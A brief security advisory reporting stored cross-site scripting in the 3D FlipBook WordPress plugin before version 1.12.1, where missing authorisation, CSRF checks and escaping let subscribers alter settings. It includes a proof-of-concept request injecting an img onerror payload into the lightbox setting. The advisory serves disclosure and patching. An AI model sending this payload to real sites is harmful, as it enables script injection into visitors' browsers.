3D FlipBook < 1.12.1 - Subscriber+ Stored Cross-Site Scripting
The plugin does not have authorisation and CSRF checks when updating its settings, and does not have any sanitisation/escaping, allowing any authenticated users, such as subscriber to put Cross-Site Scripting payloads in all pages with a 3d flipbook.
Proof of Concept
As a subscriber:
"body": "action=fb3d_receive_book_control_props&props[lightbox][default]=xxx\"><img src onerror=alert(/XSS/)>",
}).then(response => response.text())
.then(data => console.log(data));
The XSS will be triggered in all pages with a 3d flipbook